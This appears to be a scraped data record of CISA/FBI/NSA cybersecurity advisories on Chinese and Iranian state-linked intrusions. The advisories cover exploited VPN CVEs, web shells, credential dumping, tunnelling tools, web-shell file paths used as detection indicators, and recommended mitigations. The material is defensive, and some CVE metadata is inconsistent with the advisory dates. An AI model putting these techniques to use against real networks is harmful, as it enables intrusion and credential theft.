[[D3-CSPP](<https://d3fend.mitre.org/technique/d3f:Client-serverPayloadProfiling>)]\n\n * File Carving [[D3-FC](<https://d3fend.mitre.org/technique/d3f:FileCarving>)]\n\nIsolate: \n\n * Network Isolation\n\n * DNS Denylisting [[D3-DNSDL](<https://d3fend.mitre.org/technique/d3f:DNSDenylisting>)] \n \nIngress Tool Transfer [[T1105](<https://attack.mitre.org/versions/v9/techniques/T1105>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed importing tools from GitHub or infected domains to victim networks. In some instances. Chinese state-sponsored cyber actors used the Server Message Block (SMB) protocol to import tools into victim networks.\n\n| \n\n * Perform ingress traffic analysis to identify transmissions that are outside of normal network behavior. \n\n * Do not expose services and protocols (such as File Transfer Protocol [FTP]) to the Internet without strong business justification.\n\n * Use signature-based network intrusion detection and prevention systems to identify adversary malware coming into the network.\n\n| \n\nIsolate:\n\n * Network Isolation\n\n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)] \n \nNon-Standard Port [[T1571](<https://attack.mitre.org/versions/v9/techniques/T1571>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using a non-standard SSH port to establish covert communication channels with VPS infrastructure. \n\n| \n\n * Use signature-based network intrusion detection and prevention systems to identify adversary malware calling back to C2.\n\n * Configure firewalls to limit outgoing traffic to only required ports based on the functions of that network segment.\n\n * Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Client-server Payload Profiling [[D3-CSPP](<https://d3fend.mitre.org/technique/d3f:Client-serverPayloadProfiling>)]\n\n * Protocol Metadata Anomaly Detection [[D3-PMAD](<https://d3fend.mitre.org/technique/d3f:ProtocolMetadataAnomalyDetection>)]\n\nIsolate:\n\n * Network Isolation\n\n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)]\n\n * Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)] \n \nProtocol Tunneling [[T1572](<https://attack.mitre.org/versions/v9/techniques/T1572>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using tools like dog-tunnel and `dns2tcp.exe` to conceal C2 traffic with existing network activity. \n\n| \n\n * Monitor systems for connections using ports/protocols commonly associated with tunneling, such as SSH (port 22). Also monitor for processes commonly associated with tunneling, such as Plink and the OpenSSH client.\n\n * Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards.\n\n * Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server) \n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Protocol Metadata Anomaly Detection [[D3-PMAD](<https://d3fend.mitre.org/technique/d3f:ProtocolMetadataAnomalyDetection>)] \n \nProxy [[T1090](<https://attack.mitre.org/versions/v9/techniques/T1090>)]: \n\n * Multi-Hop Proxy [[T1090.003](<https://attack.mitre.org/versions/v9/techniques/T1090/003>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using a network of VPSs and small office and home office (SOHO) routers as part of their operational infrastructure to evade detection and host C2 activity. Some of these nodes operate as part of an encrypted proxy service to prevent attribution by concealing their country of origin and TTPs.\n\n| \n\nMonitor traffic for encrypted communications originating from potentially breached routers to other routers within the organization. Compare the source and destination with the configuration of the device to determine if these channels are authorized VPN connections or other encrypted modes of communication.\n\n * Alert on traffic to known anonymity networks (such as Tor) or known adversary infrastructure that uses this technique.\n\n * Use network allow and blocklists to block traffic to known anonymity networks and C2 infrastructure.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Protocol Metadata Anomaly Detection [[D3-PMAD](<https://d3fend.mitre.org/technique/d3f:ProtocolMetadataAnomalyDetection>)]\n\n * Relay Pattern Analysis [[D3-RPA](<https://d3fend.mitre.org/technique/d3f:RelayPatternAnalysis>)]\n\nIsolate: \n\n * Network Isolation\n\n * Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)] \n \n### Appendix B: MITRE ATT&amp;CK Framework \n\n\n\n_Figure 2: MITRE ATT&amp;CK Enterprise tactics and techniques used by Chinese state-sponsored cyber actors ([Click here for the downloadable JSON file](<https://github.com/nsacyber/chinese-state-sponsored-cyber-operations-observed-ttps>).) _\n\n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<http://www.fbi.gov/contact-us/field>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.\n\nTo request incident response resources or technical assistance related to these threats, contact CISA at [Central@cisa.dhs.gov](<mailto:Central@cisa.dhs.gov>).\n\nFor NSA client requirements or general cybersecurity inquiries, contact the NSA Cybersecurity Requirements Center at 410-854-4200 or [Cybersecurity_Requests@nsa.gov.](<mailto:Cybersecurity_Requests@nsa.gov>)\n\nMedia Inquiries / Press Desk: \n\u2022 NSA Media Relations, 443-634-0721, [MediaRelations@nsa.gov](<mailto:MediaRelations@nsa.gov>) \n\u2022 CISA Media Relations, 703-235-2010, [CISAMedia@cisa.dhs.gov](<mailto:CISAMedia@cisa.dhs.gov>) \n\u2022 FBI National Press Office, 202-324-3691, [npo@fbi.gov](<mailto:npo@fbi.gov>)\n\n### References\n\n[[1] FireEye: This is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits](<https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html>)\n\n### Revisions\n\nJuly 19, 2021: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-08-20T12:00:00", "type": "ics", "title": "Chinese State-Sponsored Cyber Operations: Observed TTPs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902", "CVE-2022-42475", "CVE-2022-47966"], "modified": "2021-08-20T12:00:00", "id": "AA21-200B", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-200b", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-23T07:30:36", "description": "### Summary\n\n_This Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&amp;CK\u00ae) framework. See the [ATT&amp;CK for Enterprise](<https://attack.mitre.org/matrices/enterprise/>) framework for all referenced threat actor techniques._\n\nThis product was written by the Cybersecurity and Infrastructure Security Agency (CISA) with contributions from the Federal Bureau of Investigation (FBI). CISA and FBI are aware of an Iran-based malicious cyber actor targeting several U.S. federal agencies and other U.S.-based networks. Analysis of the threat actor\u2019s indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs) indicates a correlation with the group known by the names, Pioneer Kitten and UNC757. This threat actor has been observed exploiting several publicly known Common Vulnerabilities and Exposures (CVEs) dealing with Pulse Secure virtual private network (VPN), Citrix NetScaler, and F5 vulnerabilities. This threat actor used these vulnerabilities to gain initial access to targeted networks and then maintained access within the successfully exploited networks for several months using multiple means of persistence.\n\nThis Advisory provides the threat actor\u2019s TTPs, IOCs, and exploited CVEs to help administrators and network defenders identify a potential compromise of their network and protect their organization from future attacks.\n\n[Click here](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-259A-Iran-Based_Threat_Actor_Exploits_VPN_Vulnerabilities_S508C.pdf>) for a PDF version of this report.\n\n### Technical Details\n\nCISA and FBI are aware of a widespread campaign from an Iran-based malicious cyber actor targeting several industries mainly associated with information technology, government, healthcare, financial, insurance, and media sectors across the United States. The threat actor conducts mass-scanning and uses tools, such as Nmap, to identify open ports. Once the open ports are identified, the threat actor exploits CVEs related to VPN infrastructure to gain initial access to a targeted network. CISA and the FBI have observed the threat actor exploiting multiple CVEs, including CVE-2019-11510, CVE-2019-11539, CVE-2019-19781, and CVE-2020-5902.\n\nAfter gaining initial access to a targeted network, the threat actor obtains administrator-level credentials and installs web shells allowing further entrenchment. After establishing a foothold, the threat actor\u2019s goals appear to be maintaining persistence and exfiltrating data. This threat actor has been observed selling access to compromised network infrastructure in an online hacker forum. Industry reporting indicates that the threat actor operates as a contractor supporting Iranian government interests, but the malicious activity appears to also serve the threat actor\u2019s own financial interests. The FBI notes this threat actor has the capability, and likely the intent, to deploy ransomware on victim networks.\n\nCISA and FBI have observed this Iran-based threat actor relying on exploits of remote external services on internet-facing assets to gain initial access to victim networks. The threat actor also relies heavily on open-source and operating system (OS) tooling to conduct operations, such as ngrok; fast reverse proxy (FRP); Lightweight Directory Access Protocol (LDAP) directory browser; as well as web shells known as ChunkyTuna, Tiny, and China Chopper.\n\nTable 1 illustrates some of the common tools this threat actor has used.\n\n_Table 1: Common exploit tools_\n\nTool\n\n| \n\nDetail \n \n---|--- \n \nChunkyTuna web shell\n\n| ChunkyTuna allows for chunked transfer encoding hypertext transfer protocol (HTTP) that tunnels Transmission Control Protocol (TCP) streams over HTTP. The web shell allows for reverse connections to a server with the intent to exfiltrate data. \n \nTiny web shell\n\n| Tiny uses Hypertext Preprocessor (PHP) to create a backdoor. It has the capability to allow a threat actor remote access to the system and can also tunnel or route traffic. \n \nChina Chopper web shell\n\n| China Chopper is a web shell hosted on a web server and is mainly used for web application attacks; it is configured in a client/server relationship. China Chopper contains security scanners and can be used to upload files and brute-force passwords. \nFRPC | FRPC is a modified version of the open-source FRP tool. It allows a system\u2014inside a router or firewall providing Network Address Translation\u2014to provide network access to systems/operators located outside of the victim network. In this case, FRPC was used as reverse proxy, tunneling Remote Desktop Protocol (RDP) over Transport Layer Security (TLS), giving the threat actor primary persistence. \nChisel | Chisel is a fast TCP tunnel over HTTP and secured via Secure Shell (SSH). It is a single executable that includes both client and server. The tool is useful for passing through firewalls, but it can also be used to provide a secure form of communication to an endpoint on a victim network. \nngrok | ngrok is a tool used to expose a local port to the internet. Optionally, tunnels can be secured with TLS. \nNmap | Nmap is used for vulnerability scanning and network discovery. \nAngry IP Scanner | Angry IP Scanner is a scanner that can ping a range of Internet Protocol (IP) addresses to check if they are active and can also resolve hostnames, scan ports, etc. \nDrupwn | Drupwn is a Python-based tool used to scan for vulnerabilities and exploit CVEs in Drupal devices. \n \nNotable means of detecting this threat actor:\n\n * CISA and the FBI note that this group makes significant use of ngrok, which may appear as TCP port 443 connections to external cloud-based infrastructure.\n * The threat actor uses FRPC over port 7557.\n * [Malware Analysis Report MAR-10297887-1.v1](<https://us-cert.cisa.gov/ncas/analysis-reports/ar20-259a>) details some of the tools this threat actor used against some victims.\n\nThe following file paths can be used to detect Tiny web shell, ChunkyTuna web shell, or Chisel if a network has been compromised by this attacker exploiting CVE-2019-19781.\n\n * Tiny web shell\n\n` /netscaler/ns_gui/admin_ui/rdx/core/css/images/css.php \n/netscaler/ns_gui/vpn/images/vpn_ns_gui.php \n/var/vpn/themes/imgs/tiny.php`\n\n * ChunkyTuna web shell\n\n` /var/vpn/themes/imgs/debug.php \n/var/vpn/themes/imgs/include.php \n/var/vpn/themes/imgs/whatfile`\n\n * Chisel\n\n` /var/nstmp/chisel`\n\n### MITRE ATT&amp;CK Framework\n\n#### Initial Access\n\nAs indicated in table 2, the threat actor primarily gained initial access by using the publicly available exploit for CVE-2019-19781. From there, the threat actor used the Citrix environment to establish a presence on an internal network server.\n\n_Table 2: Initial access techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1190](<https://attack.mitre.org/techniques/T1190/>)\n\n| Exploit Public-Facing Application | The threat actor primarily gained initial access by compromising a Citrix NetScaler remote access server using a publicly available exploit for CVE-2019-19781. The threat actor also exploited CVE-2019-11510, CVE-2019-11539, and CVE-2020-5902. \n \n#### Execution\n\nAfter gaining initial access, the threat actor began executing scripts, as shown in table 3.\n\n_Table 3: Execution techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1059.001](<https://attack.mitre.org/techniques/T1059/001/>)\n\n| Command and Scripting Interpreter: PowerShell | A PowerShell script (`keethief` and `kee.ps1`) was used to access KeePass data. \n \n[T1059.003](<https://attack.mitre.org/techniques/T1059/003/>)\n\n| Command and Scripting Interpreter: Windows Command Shell | `cmd.exe` was launched via sticky keys that was likely used as a password changing mechanism. \n \n#### Persistence\n\nCISA observed the threat actor using the techniques identified in table 4 to establish persistence.\n\n_Table 4: Persistence techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1053.003](<https://attack.mitre.org/techniques/T1053/003/>)\n\n| Scheduled Task/Job: Cron | The threat actor loaded a series of scripts to `cron` and ran them for various purposes (mainly to access NetScaler web forms). \n \n[T1053.005](<https://attack.mitre.org/techniques/T1053/005/>)\n\n| Scheduled Task/Job: Scheduled Task | The threat actor installed and used FRPC (`frpc.exe`) on both NetScaler and internal devices. The task was named `lpupdate` and the binary was named `svchost`, which was the reverse proxy. The threat actor executed this command daily. \n \n[T1505.003](<https://attack.mitre.org/techniques/T1505/003/>)\n\n| Server Software Component: Web Shell | The threat actor used several web shells on existing web servers. Both NetScaler and web servers called out for ChunkyTuna. \n \n[T1546.008](<https://attack.mitre.org/techniques/T1546/008/>)\n\n| Event Triggered Execution: Accessibility Features | The threat actor used sticky keys (`sethc.exe`) to launch `cmd.exe`. \n \n#### Privilege Escalation\n\nCISA observed no evidence of direct privilege escalation. The threat actor attained domain administrator credentials on the NetScaler device via exploit and continued to expand credential access on the network.\n\n#### Defense Evasion\n\nCISA observed the threat actor using the techniques identified in table 5 to evade detection.\n\n_Table 5: Defensive evasion techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1027.002](<https://attack.mitre.org/techniques/T1027/002/>)\n\n| Obfuscated Files or Information: Software Packing | The threat actor used base64 encoding for payloads on NetScaler during initial access, making the pre-compiled payloads easier to avoid detection. \n \n[T1027.004](<https://attack.mitre.org/techniques/T1036/004/>)\n\n| Obfuscated Files or Information: Compile After Delivery | The threat actor used base64 encoding schemes on distributed (uncompiled) scripts and files to avoid detection. \n \n[T1036.004](<https://attack.mitre.org/techniques/T1245/>)\n\n| Masquerading: Masquerade Task or Service | The threat actor used FRPC (`frpc.exe`) daily as reverse proxy, tunneling RDP over TLS. The FRPC (`frpc.exe`) task name was `lpupdate` and ran out of Input Method Editor (IME) directory. In other events, the threat actor has been observed hiding activity via ngrok. \n \n[T1036.005](<https://attack.mitre.org/techniques/T1036/005/>)\n\n| Masquerading: Match Legitimate Name or Location | The FRPC (`frpc.exe`) binary name was `svchost`, and the configuration file was `dllhost.dll`, attempting to masquerade as a legitimate Dynamic Link Library. \n \n[T1070.004](<https://attack.mitre.org/techniques/T1070/004/>)\n\n| Indicator Removal on Host: File Deletion | To minimize their footprint, the threat actor ran `./httpd-nscache_clean` every 30 minutes, which cleaned up files on the NetScaler device. \n \n#### Credential Access\n\nCISA observed the threat actor using the techniques identified in table 6 to further their credential access.\n\n_Table 6: Credential access techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1003.001](<https://attack.mitre.org/techniques/T1003/001/>)\n\n| OS Credential Dumping: LSASS Memory | The threat actor used `procdump` to dump process memory from the Local Security Authority Subsystem Service (LSASS). \n \n[T1003.003](<https://attack.mitre.org/techniques/T1003/003/>)\n\n| OS Credential Dumping: Windows NT Directory Services (NTDS) | The threat actor used Volume Shadow Copy to access credential information from the NTDS file. \n \n[T1552.001](<https://attack.mitre.org/techniques/T1552/001/>)\n\n| Unsecured Credentials: Credentials in Files | The threat actor accessed files containing valid credentials. \n \n[T1555](<https://attack.mitre.org/techniques/T1555/>)\n\n| Credentials from Password Stores | The threat actor accessed a `KeePass` database multiple times and used `kee.ps1` PowerShell script. \n \n[T1558](<https://attack.mitre.org/techniques/T1558/>)\n\n| Steal or Forge Kerberos Tickets | The threat actor conducted a directory traversal attack by creating files and exfiltrating a Kerberos ticket on a NetScaler device. The threat actor was then able to gain access to a domain account. \n \n#### Discovery\n\nCISA observed the threat actor using the techniques identified in table 7 to learn more about the victim environments.\n\n_Table 7: Discovery techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1018](<https://attack.mitre.org/techniques/T1018/>)\n\n| Remote System Discovery | The threat actor used Angry IP Scanner to detect remote systems. \n \n[T1083](<https://attack.mitre.org/techniques/T1083/>)\n\n| File and Directory Discovery | The threat actor used WizTree to obtain network files and directory listings. \n \n[T1087](<https://attack.mitre.org/techniques/T1087/>)\n\n| Account Discovery | The threat actor accessed `ntuser.dat` and `UserClass.dat` and used Softerra LDAP Browser to browse documentation for service accounts. \n \n[T1217](<https://attack.mitre.org/techniques/T1217/>)\n\n| Browser Bookmark Discovery | The threat actor used Google Chrome bookmarks to find internal resources and assets. \n \n#### Lateral Movement\n\nCISA also observed the threat actor using open-source tools such as Plink and TightVNC for lateral movement. CISA observed the threat actor using the techniques identified in table 8 for lateral movement within the victim environment.\n\n_Table 8: Lateral movement techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1021](<https://attack.mitre.org/techniques/T1021/>)\n\n| Remote Services | The threat actor used RDP with valid account credentials for lateral movement in the environment. \n \n[T1021.001](<https://attack.mitre.org/techniques/T1021/001/>)\n\n| Remote Services: Remote Desktop Protocol | The threat actor used RDP to log in and then conduct lateral movement. \n \n[T1021.002](<https://attack.mitre.org/techniques/T1021/002/>)\n\n| Remote Services: SMB/Windows Admin Shares | The threat actor used PsExec. and PSEXECSVC pervasively on several hosts. The threat actor was also observed using a valid account to access SMB shares. \n \n[T1021.004](<https://attack.mitre.org/techniques/T1021/004/>)\n\n| Remote Services: SSH | The threat actor used Plink and PuTTY for lateral movement. Artifacts of Plink were used for encrypted sessions in the system registry hive. \n \n[T1021.005](<https://attack.mitre.org/techniques/T1021/005/>)\n\n| Remote Services: Virtual Network Computing (VNC) | The threat actor installed TightVNC server and client pervasively on compromised servers and endpoints in the network environment as lateral movement tool. \n \n[T1563.002](<https://attack.mitre.org/techniques/T1563/002/>)\n\n| Remote Service Session Hijacking: RDP Hijacking | The threat actor likely hijacked a legitimate RDP session to move laterally within the network environment. \n \n#### Collection\n\nCISA observed the threat actor using the techniques identified in table 9 for collection within the victim environment.\n\n_Table 9: Collection techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1005](<https://attack.mitre.org/techniques/T1005/>)\n\n| Data from Local System | The threat actor searched local system sources to accessed sensitive documents. \n \n[T1039](<https://attack.mitre.org/techniques/T1039/>)\n\n| Data from Network Shared Drive | The threat actor searched network shares to access sensitive documents. \n \n[T1213](<https://attack.mitre.org/techniques/T1213/>)\n\n| Data from Information Repositories | The threat actor accessed victim security/IT monitoring environments, Microsoft Teams, etc., to mine valuable information. \n \n[T1530](<https://attack.mitre.org/techniques/T1530/>)\n\n| Data from Cloud Storage Object | The threat actor obtained files from the victim cloud storage instances. \n \n[T1560.001](<https://attack.mitre.org/techniques/T1560/001/>)\n\n| Archive Collected Data: Archive via Utility | The threat actor used 7-Zip to archive data. \n \n#### Command and Control\n\nCISA observed the threat actor using the techniques identified in table 10 for command and control (C2).\n\n_Table 10: Command and control techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1071.001](<https://attack.mitre.org/techniques/T1071/001/>)\n\n| Application Layer Protocol: Web Protocols | The threat actor used various web mechanisms and protocols, including the web shells listed in table 1. \n \n[T1105](<https://attack.mitre.org/techniques/T1105/>)\n\n| Ingress Tool Transfer | The threat actor downloaded tools such as PsExec directly to endpoints and downloaded web shells and scripts to NetScaler in base64-encoded schemes. \n \n[T1572](<https://attack.mitre.org/techniques/T1572/>)\n\n| Protocol Tunneling | The threat actor used `FRPC.exe` to tunnel RDP over port 443. The threat actor has also been observed using ngrok for tunneling. \n \n#### Exfiltration\n\nCISA currently has no evidence of data exfiltration from this threat actor but assesses that it was likely due to the use of 7-Zip and viewing of sensitive documents.\n\n### Mitigations\n\n#### Recommendations\n\nCISA and FBI recommend implementing the following recommendations.\n\n * If your organization has not patched for the Citrix CVE-2019-19781 vulnerability, and a compromise is suspected, follow the recommendations in CISA Alert [AA20-031A](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a>).\n * This threat actor has been observed targeting other CVEs mentioned in this report; follow the recommendations in the CISA resources provided below.\n * If using Windows Active Directory and compromise is suspected, conduct remediation of the compromised Windows Active Directory forest. \n * If compromised, rebuild/reimage compromised NetScaler devices.\n * Routinely audit configuration and patch management programs.\n * Monitor network traffic for unexpected and unapproved protocols, especially outbound to the internet (e.g., SSH, SMB, RDP).\n * Implement multi-factor authentication, especially for privileged accounts.\n * Use separate administrative accounts on separate administration workstations.\n * Implement the principle of least privilege on data access.\n * Secure RDP and other remote access solutions using multifactor authentication and \u201cjump boxes\u201d for access.\n * Deploy endpoint defense tools on all endpoints; ensure they work and are up to date.\n * Keep software up to date.\n\n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<https://www.fbi.gov/contact-us/field-offices>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto:%20CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at [central@cisa.dhs.gov](<mailto:%20Central@cisa.dhs.gov>).\n\n### Resources\n\n[CISA Alert AA20-031A: Detecting Citrix CVE-2019-19781](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a>) \n[CISA Alert AA20-073A: Enterprise VPN Security](<https://us-cert.cisa.gov/ncas/alerts/aa20-073a>) \n[CISA Alert AA20-107A: Continued Threat Actor Exploitation Post Pulse Secure VPN Patching](<https://us-cert.cisa.gov/ncas/alerts/aa20-107a>) \n[CISA Alert AA20-206A: Threat Actor Exploitation of F5 BIG-IP CVE-2020-5902](<https://us-cert.cisa.gov/ncas/alerts/aa20-206a>) \n[CISA Security Tip: Securing Network Infrastructure Devices](<https://us-cert.cisa.gov/ncas/tips/ST18-001>)\n\n### Revisions\n\nSeptember 15, 2020: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-15T12:00:00", "type": "ics", "title": "Iran-Based Threat Actor Exploits VPN Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-11539", "CVE-2019-19781", "CVE-2020-5902", "CVE-2022-42475", "CVE-2022-47966"], "modified": "2020-09-15T12:00:00", "id": "AA20-259A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-259a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-23T07:28:38", "description": "### Summary\n\n_This joint cybersecurity advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&amp;CK\u00ae) framework. See the [ATT&amp;CK for Enterprise](<https://attack.mitre.org/versions/v7/matrices/enterprise/>) framework for all referenced threat actor techniques._\n\n**Note:** the analysis in this joint cybersecurity advisory is ongoing, and the information provided should not be considered comprehensive. The Cybersecurity and Infrastructure Security Agency (CISA) will update this advisory as new information is available.\n\nThis joint cybersecurity advisory was written by CISA with contributions from the Federal Bureau of Investigation (FBI). \n\nCISA has recently observed advanced persistent threat (APT) actors exploiting multiple legacy vulnerabilities in combination with a newer privilege escalation vulnerability\u2014[CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>)\u2014in Windows Netlogon. The commonly used tactic, known as vulnerability chaining, exploits multiple vulnerabilities in the course of a single intrusion to compromise a network or application. \n\nThis recent malicious activity has often, but not exclusively, been directed at federal and state, local, tribal, and territorial (SLTT) government networks. Although it does not appear these targets are being selected because of their proximity to elections information, there may be some risk to elections information housed on government networks.\n\nCISA is aware of some instances where this activity resulted in unauthorized access to elections support systems; however, CISA has no evidence to date that integrity of elections data has been compromised. There are steps that election officials, their supporting SLTT IT staff, and vendors can take to help defend against this malicious cyber activity.\n\nSome common tactics, techniques, and procedures (TTPs) used by APT actors include leveraging legacy network access and virtual private network (VPN) vulnerabilities in association with the recent critical [CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) Netlogon vulnerability. CISA is aware of multiple cases where the Fortinet FortiOS Secure Socket Layer (SSL) VPN vulnerability [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) has been exploited to gain access to networks. To a lesser extent, CISA has also observed threat actors exploiting the MobileIron vulnerability [CVE-2020-15505](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>). While these exploits have been observed recently, this activity is ongoing and still unfolding.\n\nAfter gaining initial access, the actors exploit [CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) to compromise all Active Directory (AD) identity services. Actors have then been observed using legitimate remote access tools, such as VPN and Remote Desktop Protocol (RDP), to access the environment with the compromised credentials. Observed activity targets multiple sectors and is not limited to SLTT entities.\n\nCISA recommends network staff and administrators review internet-facing infrastructure for these and similar vulnerabilities that have or could be exploited to a similar effect, including Juniper [CVE-2020-1631](<https://nvd.nist.gov/vuln/detail/CVE-2020-1631>), Pulse Secure [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>), Citrix NetScaler [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>), and Palo Alto Networks [CVE-2020-2021](<https://nvd.nist.gov/vuln/detail/CVE-2020-2021>) (this list is not considered exhaustive).\n\nClick here for a PDF version of this report.\n\n### Technical Details\n\n### Initial Access\n\nAPT threat actors are actively leveraging legacy vulnerabilities in internet-facing infrastructure (_Exploit Public-Facing Application_ [[T1190](<https://attack.mitre.org/versions/v7/techniques/T1190/>)], _External Remote Services_ [[T1133](<https://attack.mitre.org/versions/v7/techniques/T1133/>)]) to gain initial access into systems. The APT actors appear to have predominately gained initial access via the Fortinet FortiOS VPN vulnerability [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>).\n\nAlthough not observed in this campaign, other vulnerabilities, listed below, could be used to gain network access (as analysis is evolving, these listed vulnerabilities should not be considered comprehensive). As a best practice, it is critical to patch all known vulnerabilities within internet-facing infrastructure.\n\n * Citrix NetScaler [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)\n * MobileIron [CVE-2020-15505](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>)\n * Pulse Secure [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n * Palo Alto Networks [CVE-2020-2021](<https://nvd.nist.gov/vuln/detail/CVE-2020-2021>)\n * F5 BIG-IP [CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>)\n\n#### Fortinet FortiOS SSL VPN CVE-2018-13379\n\n[CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) is a path traversal vulnerability in the FortiOS SSL VPN web portal. An unauthenticated attacker could exploit this vulnerability to download FortiOS system files through specially crafted HTTP resource requests.[[1](<https://www.fortiguard.com/psirt/FG-IR-18-384>)]\n\n### MobileIron Core &amp; Connector Vulnerability CVE-2020-15505\n\n[CVE-2020-15505](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>) is a remote code execution vulnerability in MobileIron Core &amp; 